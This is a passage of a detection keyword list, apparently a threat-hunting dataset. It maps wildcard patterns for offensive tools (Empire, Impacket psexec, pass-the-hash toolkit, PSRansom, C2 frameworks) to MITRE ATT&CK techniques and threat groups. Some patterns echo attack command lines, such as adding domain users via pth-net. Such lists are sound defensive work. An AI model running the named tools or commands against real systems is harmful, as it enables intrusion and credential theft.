APT29,C2,https://github.com/Gality369/CS-Loader,1,1,N/A,10,10,751,149,2021-08-11T06:43:52Z,2020-08-17T21:33:06Z -*pse2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*ps-empire client*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*ps-empire server*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*ps-empire*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*psexec.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*PsExec[1].exe*,greyware_tool_keyword,psexec,Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling lateral movement. privilege escalation. or the execution of malicious payloads.,T1047 - T1105 - T1204,TA0003 - TA0008 - TA0040,N/A,N/A,Lateral movement,https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*psexec_ms17_010.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*PSEXEC_PSH *,offensive_tool_keyword,cobaltstrike,Bloodhound Attack Path Automation in CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/vysecurity/ANGRYPUPPY,1,0,N/A,10,10,300,93,2020-04-26T17:35:31Z,2017-07-11T14:18:07Z -*PsExec64*,greyware_tool_keyword,psexec,Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling lateral movement. privilege escalation. or the execution of malicious payloads.,T1047 - T1105 - T1204,TA0003 - TA0008 - TA0040,N/A,N/A,Lateral movement,https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*-PsExecCmd*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-PsExec.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*PsExecLiveImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*PsExecMenu(*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*PSEXECSVC*,greyware_tool_keyword,psexec,PsExec is a legitimate Microsoft tool for remote administration. However. attackers can misuse it to execute malicious commands or software on other network machines. install persistent threats. and evade some security systems. ,T1047 - T1105 - T1204,TA0003 - TA0008 - TA0040,N/A,N/A,Lateral movement,https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*PShlSpy*,signature_keyword,Antivirus Signature,highly revelant Antivirus signature. phishing tools,N/A,N/A,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*psinject * x64 Invoke-*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*psinject -PID*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*pslo *.ps1*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*PsLoggedon.exe*,greyware_tool_keyword,psloggedon,PsLoggedOn is an applet that displays both the locally logged on users and users logged on via resources for either the local computer. or a remote one,T1003 - T1049 - T1057 - T1082 - T1087 - T1518,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Reconnaissance,https://learn.microsoft.com/en-us/sysinternals/downloads/psloggedon,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*PsLoggedon64.exe*,greyware_tool_keyword,psloggedon,PsLoggedOn is an applet that displays both the locally logged on users and users logged on via resources for either the local computer. or a remote one,T1003 - T1049 - T1057 - T1082 - T1087 - T1518,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Reconnaissance,https://learn.microsoft.com/en-us/sysinternals/downloads/psloggedon,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*pSNIRFgTuZnCdHN*,offensive_tool_keyword,trevorc2,Command and Control via Legitimate Behavior over HTTP,T1105 - T1071 - T1070,TA0011,N/A,N/A,C2,https://github.com/trustedsec/trevorc2,1,0,N/A,10,10,1100,244,2022-01-31T20:16:24Z,2017-10-27T15:59:28Z -*PSObfucate.py*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*Pspersist-main*,offensive_tool_keyword,Pspersist,Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.,T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001,TA0005 ,N/A,N/A,Persistence,https://github.com/TheD1rkMtr/Pspersist,1,1,N/A,10,1,72,17,2023-08-02T02:27:29Z,2023-02-01T17:21:38Z -*PSprofile.cpp*,offensive_tool_keyword,Pspersist,Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.,T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001,TA0005 ,N/A,N/A,Persistence,https://github.com/TheD1rkMtr/Pspersist,1,0,N/A,10,1,72,17,2023-08-02T02:27:29Z,2023-02-01T17:21:38Z -*pspy*psscanner,offensive_tool_keyword,pspy,Monitor linux processes without root permissions,T1057 - T1514 - T1082,TA0007 - TA0009 - TA0003,N/A,N/A,Discovery,https://github.com/DominicBreuker/pspy,1,0,N/A,6,10,4029,449,2023-01-17T21:09:22Z,2018-02-08T21:41:37Z -*pspy32 -*,offensive_tool_keyword,pspy,Monitor linux processes without root permissions,T1057 - T1514 - T1082,TA0007 - TA0009 - TA0003,N/A,N/A,Discovery,https://github.com/DominicBreuker/pspy,1,0,N/A,6,10,4029,449,2023-01-17T21:09:22Z,2018-02-08T21:41:37Z -*pspy64 -*,offensive_tool_keyword,pspy,Monitor linux processes without root permissions,T1057 - T1514 - T1082,TA0007 - TA0009 - TA0003,N/A,N/A,Discovery,https://github.com/DominicBreuker/pspy,1,0,N/A,6,10,4029,449,2023-01-17T21:09:22Z,2018-02-08T21:41:37Z -*pspy-build:latest*,offensive_tool_keyword,pspy,Monitor linux processes without root permissions,T1057 - T1514 - T1082,TA0007 - TA0009 - TA0003,N/A,N/A,Discovery,https://github.com/DominicBreuker/pspy,1,0,N/A,6,10,4029,449,2023-01-17T21:09:22Z,2018-02-08T21:41:37Z -*pspy-development:latest*,offensive_tool_keyword,pspy,Monitor linux processes without root permissions,T1057 - T1514 - T1082,TA0007 - TA0009 - TA0003,N/A,N/A,Discovery,https://github.com/DominicBreuker/pspy,1,0,N/A,6,10,4029,449,2023-01-17T21:09:22Z,2018-02-08T21:41:37Z -*pspy-example:latest*,offensive_tool_keyword,pspy,Monitor linux processes without root permissions,T1057 - T1514 - T1082,TA0007 - TA0009 - TA0003,N/A,N/A,Discovery,https://github.com/DominicBreuker/pspy,1,0,N/A,6,10,4029,449,2023-01-17T21:09:22Z,2018-02-08T21:41:37Z -*pspy-master*,offensive_tool_keyword,pspy,Monitor linux processes without root permissions,T1057 - T1514 - T1082,TA0007 - TA0009 - TA0003,N/A,N/A,Discovery,https://github.com/DominicBreuker/pspy,1,1,N/A,6,10,4029,449,2023-01-17T21:09:22Z,2018-02-08T21:41:37Z -*pspy-testing:latest*,offensive_tool_keyword,pspy,Monitor linux processes without root permissions,T1057 - T1514 - T1082,TA0007 - TA0009 - TA0003,N/A,N/A,Discovery,https://github.com/DominicBreuker/pspy,1,0,N/A,6,10,4029,449,2023-01-17T21:09:22Z,2018-02-08T21:41:37Z -*PSRansom.ps1*,offensive_tool_keyword,PSRansom,PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.,T1486 - T1107 - T1566.001,TA0011 - TA0010,N/A,N/A,Ransomware,https://github.com/JoelGMSec/PSRansom,1,1,N/A,N/A,4,371,95,2022-09-29T09:54:34Z,2022-02-27T11:52:03Z -*PSRecon*,offensive_tool_keyword,PSRecon,PSRecon gathers data from a remote Windows host using PowerShell (v2 or later). organizes the data into folders. hashes all extracted data. hashes PowerShell and various system properties. and sends the data off to the security team. The data can be pushed to a share. sent over email. or retained locally.,T1059 - T1003 - T1556 - T1204,TA0002 - TA0009,N/A,N/A,Information Gathering,https://github.com/gfoss/PSRecon,1,1,N/A,N/A,5,465,111,2017-07-29T15:03:04Z,2015-08-03T05:43:38Z -*psreflect *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*pstgdump.exe*,offensive_tool_keyword,fgdump,A utility for dumping passwords on Windows NT/2000/XP/2003 machines,T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001,TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008,N/A,Volt Typhoon,Credential Access,https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*pstree.ps1*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*PSWtool*,signature_keyword,Antivirus Signature,highly revelant Antivirus signature. Programs classified as PSWTool can be used to view or restore forgotten often hidden passwords. They can also be used with malicious intent. even though the programs themselves have no malicious payload.,N/A,N/A,N/A,N/A,Credential Access,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*PtC.exe challenge*,offensive_tool_keyword,PassTheChallenge,Recovering NTLM hashes from Credential Guard,T1552.004,TA0003,N/A,N/A,Exploitation tools,https://github.com/ly4k/PassTheChallenge,1,0,N/A,N/A,4,308,22,2022-12-26T01:09:18Z,2022-12-26T00:56:40Z -*PtC.exe compare*,offensive_tool_keyword,PassTheChallenge,Recovering NTLM hashes from Credential Guard,T1552.004,TA0003,N/A,N/A,Exploitation tools,https://github.com/ly4k/PassTheChallenge,1,0,N/A,N/A,4,308,22,2022-12-26T01:09:18Z,2022-12-26T00:56:40Z -*PtC.exe inject*,offensive_tool_keyword,PassTheChallenge,Recovering NTLM hashes from Credential Guard,T1552.004,TA0003,N/A,N/A,Exploitation tools,https://github.com/ly4k/PassTheChallenge,1,0,N/A,N/A,4,308,22,2022-12-26T01:09:18Z,2022-12-26T00:56:40Z -*PtC.exe nthash *,offensive_tool_keyword,PassTheChallenge,Recovering NTLM hashes from Credential Guard,T1552.004,TA0003,N/A,N/A,Exploitation tools,https://github.com/ly4k/PassTheChallenge,1,0,N/A,N/A,4,308,22,2022-12-26T01:09:18Z,2022-12-26T00:56:40Z -*PtC.exe ping*,offensive_tool_keyword,PassTheChallenge,Recovering NTLM hashes from Credential Guard,T1552.004,TA0003,N/A,N/A,Exploitation tools,https://github.com/ly4k/PassTheChallenge,1,0,N/A,N/A,4,308,22,2022-12-26T01:09:18Z,2022-12-26T00:56:40Z -*PtC.exe protect*,offensive_tool_keyword,PassTheChallenge,Recovering NTLM hashes from Credential Guard,T1552.004,TA0003,N/A,N/A,Exploitation tools,https://github.com/ly4k/PassTheChallenge,1,0,N/A,N/A,4,308,22,2022-12-26T01:09:18Z,2022-12-26T00:56:40Z -*pth-net rpc group members *Domain admins*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*pth-net rpc group members *Exchange Servers*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*pth-net rpc password * -U * -S *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*pth-net rpc user add * -U *-S *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*pth-rpcclient*,offensive_tool_keyword,pth-toolkit,A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems,T1550 - T1075 - T1110 - T1021,TA0002 - TA0003 - TA0005,N/A,N/A,Lateral movement,https://github.com/byt3bl33d3r/pth-toolkit,1,1,N/A,N/A,6,509,134,2015-02-06T15:10:41Z,2015-02-03T10:31:56Z -*pth-smbclient*,offensive_tool_keyword,pth-toolkit,A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems,T1550 - T1075 - T1110 - T1021,TA0002 - TA0003 - TA0005,N/A,N/A,Lateral movement,https://github.com/byt3bl33d3r/pth-toolkit,1,1,N/A,N/A,6,509,134,2015-02-06T15:10:41Z,2015-02-03T10:31:56Z -*PTHSMBClientDelete*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,0,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*PTHSMBClientGet*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,0,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*PTHSMBClientList*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,0,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*PTHSMBClientPut*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,0,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*PTHSMBExec*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,0,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*pth-smbget*,offensive_tool_keyword,pth-toolkit,A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems,T1550 - T1075 - T1110 - T1021,TA0002 - TA0003 - TA0005,N/A,N/A,Lateral movement,https://github.com/byt3bl33d3r/pth-toolkit,1,1,N/A,N/A,6,509,134,2015-02-06T15:10:41Z,2015-02-03T10:31:56Z -*pth-toolkit*,offensive_tool_keyword,pth-toolkit,A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems,T1550 - T1075 - T1110 - T1021,TA0002 - TA0003 - TA0005,N/A,N/A,Lateral movement,https://github.com/byt3bl33d3r/pth-toolkit,1,1,N/A,N/A,6,509,134,2015-02-06T15:10:41Z,2015-02-03T10:31:56Z -*pth-winexe*,offensive_tool_keyword,pth-toolkit,A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems,T1550 - T1075 - T1110 - T1021,TA0002 - TA0003 - TA0005,N/A,N/A,Lateral movement,https://github.com/byt3bl33d3r/pth-toolkit,1,1,N/A,N/A,6,509,134,2015-02-06T15:10:41Z,2015-02-03T10:31:56Z -*pth-wmic*,offensive_tool_keyword,pth-toolkit,A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems,T1550 - T1075 - T1110 - T1021,TA0002 - TA0003 - TA0005,N/A,N/A,Lateral movement,https://github.com/byt3bl33d3r/pth-toolkit,1,1,N/A,N/A,6,509,134,2015-02-06T15:10:41Z,2015-02-03T10:31:56Z -*PTHWMIExec*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - 